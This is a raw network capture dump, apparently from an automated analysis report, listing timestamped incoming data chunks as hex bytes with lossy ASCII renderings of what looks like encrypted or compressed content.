                                                                                                        2022-09-29 12:45:44 UTC7026INData Raw: 36 84 42 d6 32 e9 3b cb 11 61 5c 23 0f 61 57 75 ce cc e8 d7 6b db 5b b4 46 ac 1d f5 a8 e5 8b 61 9b 97 52 f4 44 b5 50 9d fb 7f 8b ec 24 67 01 87 aa 77 ec 9b 59 7d 07 29 1f 8d c0 d3 0c 1c 1e 0c 90 b1 0b 2b c8 a4 db 57 02 c2 67 5b d9 16 e0 06 e2 21 18 34 1e c6 ae b4 ca 70 6d 7c 5b 7b cc 8c 4a 1e 90 56 e3 78 aa 99 a4 f5 3b da a7 16 37 2c 8b f6 b1 29 3c a0 9b 06 f9 7d 6b 27 91 5d a3 9b b2 06 e9 04 97 7b f5 a7 4b e7 6c df 7c 89 cc ed 2e 7a 10 ad 55 f8 16 05 91 9c ba 5b 3a 30 24 51 18 19 6b 84 a8 17 a2 27 f3 40 b1 70 eb 5c 9a 7f f3 f4 ee 8f 47 73 46 ae 1c 1d c4 7e bc 9d 65 1b 59 28 69 86 6f 57 7c 83 3b ed 88 24 bc 63 73 50 22 93 70 bd b0 ea 99 b4 3e 9b 77 d6 8e 83 4b f0 1d 83 53 e7 45 40 b0 05 cf dd bd 74 a3 37 fd ea 1f b9 6b 61 56 6c 25 d7 d0 c8 b3 f9 c1 e4 1b
                                                                                                        Data Ascii: 6B2;a\#aWuk[FaRDP$gwY})+Wg[!4pm|[{JVx;7,)<}k']{Kl|.zU[:0$Qk'@p\GsF~eY(ioW|;$csP"p>wKSE@t7kaVl%
                                                                                                        2022-09-29 12:45:44 UTC7042INData Raw: fa 42 73 58 ba 83 41 0c 12 76 aa 9f 82 da c1 47 29 d6 15 c4 3e 08 d4 60 21 ed 3a 57 38 92 bb 49 57 a9 12 13 00 db e4 7f 95 ed 93 8a 09 96 bf 2b e8 44 d4 7c 1d b1 45 43 1a 3a e8 34 39 61 9a cb fb d6 7d 83 38 b2 65 b3 22 0b 4d bc 67 bb cf 02 f6 18 66 7d b9 71 3f ee 0f 2f 78 bc 09 9b b5 49 b7 ce 2a 1c 98 40 4a 55 48 7b 8d 61 e1 6f 94 b5 e4 56 ef 57 44 5d 74 32 f3 a9 55 94 aa ac b3 1c eb e8 89 7c e9 4c 01 79 06 83 3d 46 53 1e 56 c9 ad 29 b1 97 49 e5 b3 f0 2b 34 2c f8 0d fc 4c f3 83 74 c9 1e 5f 41 cd 5d 0c a4 af 4b 41 e5 33 c0 ce 37 1d a6 0f d8 09 4a dc 7b bb 7c 36 33 23 f8 af e0 8e 11 70 f4 28 8a ee e7 65 8d 4c a3 4b ee 1b 58 f5 f8 1b c8 d8 b3 82 88 88 5a e5 92 4b 44 b6 09 93 79 24 23 5d b6 cf dc 94 67 a4 84 dc 86 32 4a de 0f 07 df 03 e4 f6 09 1c 8a b8 6b 50
                                                                                                        Data Ascii: BsXAvG)>`!:W8IW+D|EC:49a}8e"Mgf}q?/xI*@JUH{aoVWD]t2U|Ly=FSV)I+4,Lt_A]KA37J{|63#p(eLKXZKDy$#]g2JkP
                                                                                                        2022-09-29 12:45:44 UTC7058INData Raw: 98 be 80 7d 00 94 8f d1 1b 07 fd 83 55 32 50 fb 7b f0 81 c9 fa 24 d5 a5 28 97 58 c9 0f d9 14 b2 b7 95 c8 a6 06 16 b6 22 0a e8 18 dc 72 49 68 29 79 35 da e7 50 e5 c0 9e 90 55 ab 6a 33 0f b3 a2 54 17 ef 92 2b 1b b4 9e b9 bd 00 70 38 54 16 3d a8 ba 37 71 44 1e c2 92 fe e1 ba 1a 9b b6 53 9a 42 ef 88 41 0f f2 08 9f 4b 0f 83 d8 16 f0 ea d1 bb 75 0d 9c 05 8f 2e 0c 04 2a 67 31 c9 b5 7f 32 0e 45 42 1f 99 ee d6 2a 0b 1d 7a 19 97 3b 62 7e dd ef 2b e5 79 10 a8 c2 b9 53 51 bd 34 9d a7 3b d0 a0 08 d3 90 12 3a a6 7a 45 45 61 47 c4 86 93 7e 64 24 0a fd 66 6e 39 57 53 fc b5 fc 30 8b fe 31 22 4a b4 b5 e5 4d 88 33 5a 97 59 e6 41 a5 ce e8 83 ff 55 6f eb ee cd 2d c4 cc f5 bf 17 a8 24 76 87 c8 11 93 81 45 26 90 6f 58 0f 73 ab fb de 1d e6 3e ae 41 a9 94 be f2 db 31 6b 32 e1 ee
                                                                                                        Data Ascii: }U2P{$(X"rIh)y5PUj3T+p8T=7qDSBAKu.*g12EB*z;b~+ySQ4;:zEEaG~d$fn9WS01"JM3ZYAUo-$vE&oXs>A1k2
                                                                                                        2022-09-29 12:45:44 UTC7074INData Raw: 8d 36 85 96 3f 31 d3 dc 91 1c 07 a2 61 09 b7 9d d2 01 60 74 ba 41 03 47 db c2 83 66 f7 28 e9 a4 6e 44 64 42 07 e4 54 67 18 f4 b4 c8 b0 d8 06 17 ee f2 cd b4 7a 3b 16 90 60 3b 45 d3 bc 82 60 7d 05 9c d6 9f fb 1e 99 7d 87 0e a6 f2 5f 25 74 d7 de a2 46 6c fd 6b 10 90 77 44 e4 a7 c7 65 a3 8b 9f 7f 38 9a 6b ac 2b b9 9e 4a f7 9f cf 0b 16 06 22 1e 7c d2 c5 66 d4 98 90 18 b1 33 bb 7f 6c ea a7 e8 aa 7f 1d 4e 27 4c f9 e8 c1 e5 ca f8 48 22 36 53 62 be cc 6a 02 23 a4 84 bc 5c 1d 46 10 fd 0f 43 99 0c cb 46 2d 14 99 72 98 4c de 4c 10 42 4e 98 cc bb 55 eb 2f 1f c7 9f 79 83 19 08 33 33 e7 55 ce f0 3c 22 c7 57 4b 52 b7 1d 62 05 9b 6c 6c 08 3e 2a 3e 46 68 81 45 74 7f 43 8f 19 73 ba 8c 4a ac b2 45 82 9a 9b ca 97 3d 88 73 2c 60 ad 41 45 d3 7a 26 39 1a 9f 78 85 7a e6 b1 c9 ba
                                                                                                        Data Ascii: 6?1a`tAGf(nDdBTgz;`;E`}}_%tFlkwDe8k+J"|f3lN'LH"6Sbj#\FCF-rLLBNU/y33U<"WKRbll>*>FhEtCsJE=s,`AEz&9xz
                                                                                                        2022-09-29 12:45:44 UTC7090INData Raw: 23 e9 e8 7c 3a d9 f3 25 b8 bd 40 97 8a cb f5 4d 20 18 68 34 e4 3b b6 12 c6 c3 9e 85 74 26 8a c8 a1 a9 3b f0 8a cb 26 97 d9 e9 8a 2c f4 9d 6f 5a 01 67 aa c2 02 7c 33 3a 54 e5 7a ae e5 15 eb ed 0f 75 eb e8 60 f4 38 fd 0d d0 41 5c ac 8d 0a 39 d8 2b e4 a0 ae 3f 9f 48 a4 ac c3 c5 95 ae 8a e0 8e a5 09 2a 04 ca 9e 2f 3c 68 34 c9 40 4a a6 b6 3c aa 25 41 27 b4 7f bc 58 56 37 df c8 9c 79 f7 fd f4 37 98 ec 4c b2 33 36 43 40 af 30 ca 0d 38 e1 c0 e1 72 73 7e 2e b8 83 e6 04 03 b8 74 e9 b6 59 a1 48 df 66 9b 0f c5 a1 17 ef cc f4 2d f0 0f f9 3f a3 87 d0 ef 8c 3d 98 05 a0 d0 54 38 73 09 f3 84 4a af 1e 88 2c fd 42 2d fb 6f e8 62 e9 af c6 fa 68 06 01 4e 25 81 a9 7a 24 68 68 eb ae 42 a1 6e c9 01 77 c4 5c d4 28 de 8d 24 5a 3c ec 1b 1b 15 f4 52 d7 c9 53 e9 9b c6 c2 9e 1b 9d 36
                                                                                                        Data Ascii: #|:%@M h4;t&;&,oZg|3:Tzu`8A\9+?H*/<h4@J<%A'XV7y7L36C@08rs~.tYHf-?=T8sJ,B-obhN%z$hhBnw\($Z<RS6
                                                                                                        2022-09-29 12:45:44 UTC7106INData Raw: ef fc d3 be d7 12 60 a7 6c 29 82 c6 3f 2a eb 12 ad fb 4a 20 3a 23 66 29 96 0c 76 ce 0e 43 d4 d0 b4 cb 6a ca e4 b8 a3 d2 85 da d1 a2 fa fe ad 40 db be 14 b3 d3 57 3a 37 46 f5 0e b4 c1 62 e7 b8 78 f9 43 f8 00 a3 22 70 19 52 ae f7 ae 11 3e 2b fe e5 be cb 0f a6 6f 78 a0 32 c4 3c fa 5e e9 b6 b3 b9 26 e7 c8 79 64 02 b9 91 43 06 fe b5 c4 22 a9 82 bc c7 d4 09 87 d0 22 c9 41 fc 0a 6d eb 9e 7e c8 00 81 3d be 31 7b 2d 9e 0c 71 3c 8f f9 24 a4 7a b3 75 52 8c fd 75 d5 ab 75 4b cf 55 0f 6c be 8b 0f 5d 18 9c 2d bb 65 63 d7 fd 63 95 d1 0d 43 d5 f7 34 bd 79 fe 3f b9 94 32 c2 5d bc b1 37 b0 20 77 d4 83 ee 98 8d a4 9e 14 0d 50 c3 b8 37 75 bf 12 f8 e5 2e 96 ae 18 e6 7f e1 f9 89 b0 1b 66 86 25 c6 27 19 08 5d 0f b3 0f 68 25 0f a2 f6 d0 ad f6 fb dc 40 a3 de 0a 84 1f 06 72 9a aa
                                                                                                        Data Ascii: `l)?*J :#f)vCj@W:7FbxC"pR>+ox2<^&ydC""Am~=1{-q<$zuRuuKUl]-eccC4y?2]7 wP7u.f%']h%@r
                                                                                                        2022-09-29 12:45:44 UTC7122INData Raw: 07 be cc 3f 6b f5 a5 4b 9e cd 6c 21 ea c6 2a 46 d0 18 89 f2 6f 35 da ea 49 4d 4f fe 59 00 63 2a da 4c 35 a5 54 a8 cd aa d7 d2 dd 8d c6 75 e6 64 36 d6 02 3d d4 b5 8e 0a 42 ee ed 9a 34 cb 61 d1 b5 25 e0 2e c9 e7 f7 38 68 14 49 f6 bb cf 5a 50 27 64 e1 2d cf 26 c9 85 21 6c 8a f3 2d a3 33 2f 17 9a 21 44 d3 1e 1c ba 20 76 90 ab 28 08 ea 68 84 5c 27 01 49 93 59 6a ec a1 3f cc e9 03 7f b1 50 9d 7a 48 8f 7c 99 26 17 19 08 7f ff a8 00 78 20 31 35 c6 1e 30 fc f1 33 e1 23 57 51 cf 0f d4 bb 80 ba 6f 81 cc dc 47 04 ed 96 41 5d 24 3e d6 c7 1c e5 f0 9d 6b 1b 91 66 b1 49 f5 cd 05 8c 22 26 51 98 ee 43 59 0f 6c b3 09 f2 ab 13 2c 58 a4 60 c9 3d 73 5f 3a 70 5d 00 bf 2e 1f 61 9e 61 b8 93 d9 55 f2 72 11 da d1 61 99 d6 a6 ad 4a 08 78 17 d8 f9 7f 31 0f 9b 03 b6 ca 19 fe 55 26 1b
                                                                                                        Data Ascii: ?kKl!*Fo5IMOYc*L5Tud6=B4a%.8hIZP'd-&!l-3/!D v(h\'IYj?PzH|&x 1503#WQoGA]$>kfI"&QCYl,X`=s_:p].aaUraJx1U&
                                                                                                        2022-09-29 12:45:44 UTC7138INData Raw: d9 76 f5 6d 22 e1 3c 2c 26 53 ef 9c 30 be af 08 fc f6 ac ed ee fa ce a6 2c 29 0a 9d 75 17 34 3b 74 e3 ef 76 04 26 33 c9 5c 42 08 ca 6e a3 c0 6a 5d 6b 47 21 fa 70 1b 46 4f 12 3b a7 a7 bc 6b 52 39 db 2e ef 7a ac e1 bc 41 04 b7 8e b6 0f 6b 3d 2e 0f 17 d4 7b c6 b5 75 6e 24 d8 76 f3 36 99 db ee c2 16 de 16 90 1c 29 4c 56 6d 8b 12 c2 6c d8 79 e4 42 c8 13 35 54 b8 81 40 86 1b 18 e0 f3 22 5f 3c f2 a8 5a 53 66 d3 1d 22 ee d2 5c 33 61 2b d8 8d 84 0f 8c 5b 3c c3 91 d0 f9 57 aa b7 f8 c7 f8 99 a1 4e 15 f1 f8 82 55 bc 30 f3 08 0c ab 8a dd 39 76 6d 89 cb 4d 8c 8a 77 0b f1 0e a8 6d 2f e8 36 b3 97 84 10 2c 78 27 c5 ed 49 81 4b f0 ec a0 01 c5 cb f0 11 0b 7c 1f 2f bf 42 53 53 21 34 5b 4d 98 6a 46 65 73 71 6c 22 05 ed 4d 8b c8 77 fe e2 3a c2 6d ae 6d 62 35 50 4f ea 78 f0 ac
                                                                                                        Data Ascii: vm"<,&S0,)u4;tv&3\Bnj]kG!pFO;kR9.zAk=.{un$v6)LVmlyB5T@"_<ZSf"\3a+[<WNU09vmMwm/6,x'IK|/BSS!4[MjFesql"Mw:mmb5POx
                                                                                                        2022-09-29 12:45:44 UTC7154INData Raw: 87 cb 6a a0 64 81 5a e5 b6 22 b9 24 cf db 34 64 df 6e 4a 20 c4 36 75 86 45 cf 09 1e fb f2 c7 d3 cc e8 a1 33 12 00 ba af 02 4b 7d 87 1f 77 84 1f c6 7d 58 1b c2 9e fb 82 36 69 21 f0 85 0f 1f 9a ae a7 2c 54 90 64 b1 88 7f 7c d6 ab 7e 1a 22 76 37 e2 81 9b 1d ce 88 5b 14 ae 3f 5f ef 1c 87 61 1b 9b 17 eb 8f 2e 50 2d 3e d5 a3 dd 88 ce 43 c8 04 86 39 fc 13 82 c9 39 6e f5 ca d2 1f 75 d9 8f ee 64 01 ae 9e 2a d6 21 94 92 a2 93 90 25 d1 91 61 9c da 3e 04 73 e0 da 57 5f 1a 7f 64 58 1c d2 f2 d6 cb 3a 7d a5 71 ff 48 d2 3c f8 4a 36 00 4d cd 81 a2 00 fa dd 15 e8 72 29 41 a7 ab 19 fd 77 70 0a 49 10 20 87 de 18 29 14 d6 1f 52 08 35 f5 98 9a 33 3a b7 fe f7 f2 0b 37 43 92 53 37 c2 91 5c 5a b7 7c 6e ac 57 b4 85 65 28 f6 72 4e d1 14 7b e2 af 3a 66 62 8f 74 41 23 9c d7 d0 2c 32
                                                                                                        Data Ascii: jdZ"$4dnJ 6uE3K}w}X6i!,Td|~"v7[?_a.P->C99nud*!%a>sW_dX:}qH<J6Mr)AwpI )R53:7CS7\Z|nWe(rN{:fbtA#,2
                                                                                                        2022-09-29 12:45:44 UTC7170INData Raw: e6 e8 2d 75 28 ea 9f ae 5a 2f a3 72 8a 95 11 b0 52 d7 0f 34 37 5c 69 42 20 7c 56 1c 10 f6 7f b5 4a 72 6c de d2 47 f4 e4 14 69 9b bd 9d 40 c3 03 79 96 1f 8b 3c a7 b1 01 a3 85 1c 3c e8 44 09 a0 a8 7d 88 c6 ce f0 96 e4 79 c4 92 8a a0 bc 19 fa 62 8a 04 9c de 23 56 d4 e2 2f 97 14 f5 89 68 cc 89 a9 f9 72 9b be 35 c9 de 8b 22 c5 52 8d 7d f0 f9 c2 e0 04 c5 34 7e 45 1a cf f3 4a a6 cc ea b4 23 f7 28 77 72 7d b5 ea 33 39 9c ec cb 16 ca b6 2f c0 ab d4 22 69 6b 0f 9a 8b fe 0f 2a dd a4 5d 73 3a 32 4a d9 12 3e 48 16 f9 a1 0c 11 9b 80 48 85 01 aa 71 0c 34 d5 b4 ef f9 69 65 c5 13 85 80 1d d2 f4 24 1b 7b e0 f0 4b 74 e7 8e 01 9e 5f 4b 82 3c 68 f8 a1 cf 45 7a c6 37 d8 58 a0 29 22 8c da cf 46 8b de 23 d3 4b 5c 98 fd 56 fe 8e 33 a0 71 d7 ce e3 3c 55 5d 8e cc 64 2f 86 a6 55 66
                                                                                                        Data Ascii: -u(Z/rR47\iB |VJrlGi@y<<D}yb#V/hr5"R}4~EJ#(wr}39/"ik*]s:2J>HHq4ie${Kt_K<hEz7X)"F#K\V3q<U]d/Uf
                                                                                                        2022-09-29 12:45:44 UTC7186INData Raw: e8 eb 78 b4 cf db 1a ac 87 6d c1 ab 15 7f 7b 79 6a 93 e9 c0 d1 fd 48 74 96 70 69 df 83 9c da fb 4e 0d a0 2c 19 ca b0 92 19 ca ca 83 5a 1c 2d 36 a2 3a b9 26 17 0e b8 59 2c 42 e1 a0 63 fc ea 61 75 22 be f7 00 ef f4 c7 42 01 50 7f de 4e 55 0e 3c 14 58 25 a4 0f 19 8b 6b 96 84 13 60 d1 dd 43 59 66 6f 3d 41 1e 78 28 ab d1 b9 5f 3d f4 2a a3 04 2c db ac 81 30 be f0 cc 0a cb ef 55 9e 09 4f df 87 8a 58 46 c1 89 3e f4 3d 46 2e 96 4f 6a 51 46 5d ef c5 94 f1 2c b1 41 30 5d 23 8f ff 15 7c 3a b9 fe 00 79 e6 21 ed 64 a0 58 72 78 ee c7 a7 8d 3d 86 32 90 9c ee 86 ef 82 d2 2e 73 83 fe fd 6a 59 0a d6 5b 21 e5 d4 2d 23 0a ca d6 84 d9 ac 52 90 7a c8 d6 ef 3c 59 d4 b2 ae 3f 01 28 b4 cd f0 e5 a5 81 58 24 50 02 f6 0c e9 4f ba 6d ba ea 38 20 b2 80 a6 a4 6d 9f ea 5c 73 e0 91 53 25
                                                                                                        Data Ascii: xm{yjHtpiN,Z-6:&Y,Bcau"BPNU<X%k`CYfo=Ax(_=*,0UOXF>=F.OjQF],A0]#|:y!dXrx=2.sjY[!-#Rz<Y?(X$POm8 m\sS%
                                                                                                        2022-09-29 12:45:44 UTC7202INData Raw: e8 6f 22 87 36 e9 51 46 dd f0 da eb 22 ad 92 8e 73 5b 86 dc f5 ab 8e a4 93 d8 b1 c5 07 c8 4e 81 3f e6 8c 25 8f 57 2b cd 27 f7 ac 7d 30 4d 8c 49 a5 d9 8d 6d 7d dc 04 2c 98 43 c9 db ea 23 45 7f 96 02 bf ec d6 e5 8b b6 ea 82 5a dc 19 f7 df 8e 54 aa 55 2e 19 06 45 28 02 99 10 b2 d1 e9 f3 b0 86 d4 fd 25 9c 10 c7 50 ab 4d 9d 48 2a e9 e8 5c f0 b0 91 cb 01 ed 83 31 86 ce 29 d1 da d7 39 75 64 4e de b0 1b 1a 2f 85 4f d3 ec 2f 9e 67 6e f8 26 53 54 c7 1a ed e9 eb df 14 c4 91 75 47 49 ca 72 c5 79 20 0a e1 9d 77 90 21 18 66 e6 9c 43 e0 80 1b b6 09 87 b4 29 17 b6 57 df 94 ad 47 32 c7 d6 65 f9 28 59 9c f9 d3 2a dd 70 9b ef 5d 92 25 cb 47 77 e1 05 ca 3d 1e fd f5 7f 8c 3c 0f 39 f7 f3 28 6b b9 a8 6e 51 22 ac 0c f3 e4 2c 6f c5 1e 4f ba d7 c5 99 90 21 22 6c 10 b3 cb 86 37 a0
                                                                                                        Data Ascii: o"6QF"s[N?%W+'}0MIm},C#EZTU.E(%PMH*\1)9udN/O/gn&STuGIry w!fC)WG2e(Y*p]%Gw=<9(knQ",oO!"l7
                                                                                                        2022-09-29 12:45:44 UTC7218INData Raw: 01 ec 77 2e 68 60 5d f1 12 57 dc 1f 41 2f 5b dc 6e cb b0 73 42 52 a9 af 48 3d f5 83 68 95 8f 57 0a 69 52 b1 09 ec 56 b1 2b 6f ca e8 73 15 4d ab bc 10 89 dd 59 87 bd 92 3f fb 23 e0 0e d1 e2 4c d4 9a 8c d7 f6 bb dc 94 b4 1a 28 99 54 4e 03 80 6f 51 a0 20 8d 64 27 de c4 f8 f9 da a7 4b d3 74 fc f5 55 94 ab cb 91 ca f3 1f a6 27 07 b4 98 89 ad 6a 81 84 69 e8 5a a4 76 42 69 98 9f 7d 48 a7 5c ee 34 45 06 b2 71 49 08 06 be c7 eb 94 ae c7 b7 41 71 b0 4d d1 16 cc ee 8a 0b fb f5 be 43 8c f1 6f ff 59 ee f8 1d fd 95 30 78 6f a3 39 3f d3 34 c1 1e a5 2d 3a c8 f1 df 28 88 85 78 9b cc 9b 97 d5 89 d2 4a fb 6e 22 de c8 3e f0 27 8c 6d 3f 44 f1 41 dd f6 5f a7 47 0b 85 cb 89 d2 f3 4c cd 84 ff c2 1d 40 c7 97 fa 75 9e 7c df d4 f9 fc 02 01 4a f4 b3 2b c8 3a bc b3 b6 ce 86 5a b0 bf
                                                                                                        Data Ascii: w.h`]WA/[nsBRH=hWiRV+osMY?#L(TNoQ d'KtU'jiZvBi}H\4EqIAqMCoY0xo9?4-:(xJn">'m?DA_GL@u|J+:Z
                                                                                                        2022-09-29 12:45:44 UTC7234INData Raw: 41 f9 5d 92 2e 1d 25 75 ef b2 d9 9e 50 98 e4 5e ef f5 58 b5 30 ce 30 3a b6 fe 0f 63 c4 15 3f 3f cc 93 66 85 dc 34 db 14 3d 7f c6 f0 f0 27 29 32 31 a6 0c d8 ba 25 22 ec ea a9 a8 3b ba f8 7d 90 ee 50 61 bf 91 94 ad 6a ba 5d d6 22 6e ff 8b b9 b5 ac 3b ec 21 d3 06 f7 36 34 35 c1 f0 dc 10 99 13 71 7f d1 72 21 6a 63 e0 d6 99 9a d6 38 de d1 89 a8 d6 a9 fc 4a a7 e0 ca 0a 56 67 de c0 d0 49 46 51 84 2c 8a a2 a4 21 be 51 e3 8c 62 c5 b9 77 cc a6 80 44 0d 2a 2e 38 45 43 8f fb 84 b2 af 48 75 5d e4 b2 02 12 6e 80 8f d2 0d 60 0c 63 3d 8f 8b 10 d8 ac 31 85 00 53 07 b0 ca a5 13 0b c1 8d f8 cc 3f 91 b1 0a 8c 90 53 48 12 63 75 31 b4 5f 83 ac bc 6a 2e 46 40 80 fe ab dd e4 fb 0a 72 f2 df 17 00 b9 86 72 7f de 28 e8 e4 fe 79 72 c7 8d be bd 3c ee 9e c9 a3 23 44 83 ba c5 62 a4 2a
                                                                                                        Data Ascii: A].%uP^X00:c??f4=')21%";}Paj]"n;!645qr!jc8JVgIFQ,!QbwD*.8ECHu]n`c=1S?SHcu1_j.F@rr(yr<#Db*
                                                                                                        2022-09-29 12:45:44 UTC7250INData Raw: 6a e0 08 78 41 80 02 63 34 36 c5 fd a2 ce 9e 62 00 0b 88 6e fa ef 32 a0 59 cf 24 51 75 13 13 9e 41 39 b1 70 9d 47 62 58 82 0c 03 bd e9 56 97 1d ff 20 7c d7 cd 69 1c c6 7b a9 5c e3 33 66 f7 0e e6 48 37 b5 30 e2 f0 2f 26 a5 f8 6e 99 4e 42 90 b4 d9 b5 4b b5 05 77 a9 9e 75 88 71 b1 58 1d bf 2f 10 0a bc df 7a ab 03 13 eb 91 ce 07 ae d8 66 6d 95 0e 00 41 ed 69 d3 20 47 7c 5f a1 74 4c 5b ac d3 91 4f 8a 03 f8 de 69 2c 2f f8 60 a4 15 64 c0 81 f7 0f b2 7c f1 00 d9 3d 42 b5 96 a6 b4 6a 1d 9d 63 09 0d 47 d7 88 f9 a4 d3 e7 47 b0 11 30 a4 4f 84 02 c1 36 0e ad db 17 bd 5b f2 a5 52 2a b5 4c 88 d3 09 06 d5 af c4 27 b5 fd ff 13 9d 57 a0 0f 4c 21 b5 01 9e 0b 42 ec 3b 78 f8 6f 88 97 51 77 c5 fe 76 71 e0 20 bb a7 36 cd d4 16 e8 5e 51 f3 a4 48 3c ce 08 fb 76 e9 d7 fe ed 34 f3
                                                                                                        Data Ascii: jxAc46bn2Y$QuA9pGbXV |i{\3fH70/&nNBKwuqX/zfmAi G|_tL[Oi,/`d|=BjcGG0O6[R*L'WL!B;xoQwvq 6^QH<v4
                                                                                                        2022-09-29 12:45:44 UTC7266INData Raw: c3 b3 c4 05 be c0 68 fb 7e 97 3e 30 ed 94 d0 a7 ac a1 89 f0 e3 12 65 e3 cd 87 c9 7b 4f 89 72 13 b9 f1 55 11 04 60 fc 4f 05 bf a5 ad ca 6e 6f 65 b6 26 42 5a 44 7a de 04 45 90 df 40 ff f9 42 0e e2 53 31 50 7d 21 5b af 6a f5 de ea ea e6 a2 d2 b2 4b d4 af bc 10 b2 2f cc f7 da 9f 5f 29 df b5 56 00 2b 8f 96 59 b8 66 e6 48 21 df c8 45 73 f7 21 38 f1 11 b9 5d 8d 36 76 b3 c2 7c f4 70 f6 7e 09 6a e3 8e 23 02 74 97 35 2e 84 9d ec 77 f5 2a 97 97 fe db 72 3d 38 a7 7b cf a0 a4 19 1d 8f d5 4d 6e 15 c9 41 5b 2e f1 42 16 75 54 6a 94 f2 ee de ab a3 2e 2a 1a df f6 ee d3 0a 69 50 16 fb 9f 60 b7 79 2a 1f ce 48 6f 2a 70 bf 94 d8 f0 02 f5 a5 f9 e9 68 0b f7 a0 5e 02 91 c7 7e 3c 29 9c 46 79 0f 12 dd d7 be d1 18 42 86 41 37 4f 43 f6 9f e3 78 5a 3f b8 0f da f4 6d 7b 75 ce 89 8a 8c
                                                                                                        Data Ascii: h~>0e{OrU`Onoe&BZDzE@BS1P}![jK/_)V+YfH!Es!8]6v|p~j#t5.w*r=8{MnA[.BuTj.*iP`y*Ho*ph^~<)FyBA7OCxZ?m{u
                                                                                                        2022-09-29 12:45:44 UTC7282INData Raw: 90 f7 9f 53 90 d4 61 fb 43 63 b7 b0 ff 0b 75 fc 9a 95 f8 41 68 bc 90 1e 61 b3 f4 5c 6a b4 cc b6 23 1a bf af 27 1f 6e 01 28 73 11 4a 6b f9 3d 36 43 47 dc f7 b5 92 1c f4 52 69 6b 6e 95 b5 c3 67 91 f8 51 64 18 bf f5 6d 91 70 79 3d 24 29 cd b9 ca 02 89 a0 b9 29 26 c5 90 7c 87 22 b0 72 4f d8 dc d8 e8 ac 31 73 42 38 76 24 6b a5 39 66 a3 0e b1 8f 2f 82 5d 87 d1 0a 3e a4 4b 05 d1 67 67 b4 c6 fb 03 2d 45 3f c5 ca 13 b6 ed b0 ff ce e6 ca 1e 16 5b 1a d4 b2 d6 5d 29 95 59 04 79 b1 f2 63 1b 7a a6 c6 8c 40 04 29 94 16 5d 97 10 82 8a 47 b6 e5 2f ee 53 bd 8c c6 7a 33 f8 0b ae 71 23 b3 63 07 61 ba 5f 5e 36 75 9b 4b 56 db 1f ce 29 51 59 07 24 6b cb 78 a4 6d 12 ea 90 dd 81 96 a9 01 d6 65 62 51 53 dd af f6 5d 06 fa c4 6d 46 f6 89 52 c6 cc dc 20 1c e7 82 18 e8 69 25 81 12 3a
                                                                                                        Data Ascii: SaCcuAha\j#'n(sJk=6CGRikngQdmpy=$))&|"rO1sB8v$k9f/]>Kgg-E?[])Yycz@)]G/Sz3q#ca_^6uKV)QY$kxmebQS]mFR i%:
                                                                                                        2022-09-29 12:45:44 UTC7298INData Raw: 75 f0 80 fd 9f 58 4d 53 2b fc 44 59 47 38 8c 5f 44 50 7c a8 6e d9 03 b2 5e 68 d4 13 13 e2 79 6a 5a c8 b0 25 fa 88 9c 63 d8 6b 3c ac f2 34 6d b8 09 d0 fd 3e c9 4e 97 89 59 0f 30 c9 0b d9 88 4c f6 db 63 2f a5 73 1e 5b de e5 1a cd 77 a1 62 ba 37 5f 09 01 b3 4b 4f a2 63 6b a0 d3 39 01 99 8f 5d a3 04 dc 6d fa af 7c 5a bc 5e cb 1c 42 f1 48 95 ff aa 4e d1 55 84 3e d4 3e dd d4 1a 51 bb a9 b4 20 50 72 c0 68 ec 72 58 93 4e 52 4e 37 b1 78 08 b5 2c 2c d4 3d 5a 1e 51 85 e1 5d 3e c9 b2 a8 a2 29 2e 93 c0 bc 40 74 2e 2a 13 d1 08 6d a9 9f 05 a4 b7 db 8b 75 c6 47 78 10 f9 be 1f 3d ed a6 62 c1 1a 6e 6c 23 b0 c5 ec 80 b2 44 e4 e1 7a 15 60 a4 46 b5 56 22 6c b3 b4 ad 41 af d4 93 7e 89 de 68 6c 06 cb fe 44 03 3a 43 4d 82 78 16 8f 24 db 59 51 ee 52 eb 4e 4d 68 d4 eb df 19 8b 56
                                                                                                        Data Ascii: uXMS+DYG8_DP|n^hyjZ%ck<4m>NY0Lc/s[wb7_KOck9]m|Z^BHNU>>Q PrhrXNRN7x,,=ZQ]>).@t.*muGx=bnl#Dz`FV"lA~hlD:CMx$YQRNMhV
                                                                                                        2022-09-29 12:45:44 UTC7314INData Raw: cc e6 84 de c9 ae 81 93 5f cb 3b 5d a1 80 fc 39 c1 1e 0b cd 19 d6 76 8c 6d 0f ed fc 36 60 30 62 5e 2a 40 16 f9 f5 11 76 41 e1 a5 4c ea 12 62 b0 79 29 d6 27 85 06 f1 db 14 86 43 48 28 24 d5 48 cf de c4 e2 45 13 40 08 14 00 8a 9e df fa 8a 55 43 31 b5 ba 96 4f 9e 89 a0 60 d5 f5 01 a8 ea 8d f5 13 fe 99 96 7b 27 43 c4 b0 79 6b e1 55 1a 13 73 16 22 6d 63 39 96 2e 4e a4 7e c3 9e 75 58 c7 d3 d1 41 c0 7b 5c 14 19 34 1c 06 b5 fe 7c 12 e8 2a 27 6b 6d d0 66 ba c8 ba 23 dd 6b 50 d0 6a a7 f4 ec c0 6a 24 d6 e5 89 b6 12 60 a1 32 ca 3d 25 9f 06 70 47 f4 1b 1b 55 82 8f ab 60 28 9a b8 79 45 b9 8d 84 89 de 51 6c 50 bf 18 e1 fc b3 46 0f 70 91 b6 41 4f c2 e6 1a b1 6c f6 e3 0f a6 6b 36 bd a2 b6 b9 b3 34 73 68 1d ff 7a 66 7f 5f 98 aa 00 c1 bd 69 1e 60 24 3d 97 12 88 42 3f 69 ae
                                                                                                        Data Ascii: _;]9vm6`0b^*@vALby)'CH($HE@UC1O`{'CykUs"mc9.N~uXA{\4|*'kmf#kPjj$`2=%pGU`(yEQlPFpAOlk64shzf_i`$=B?i
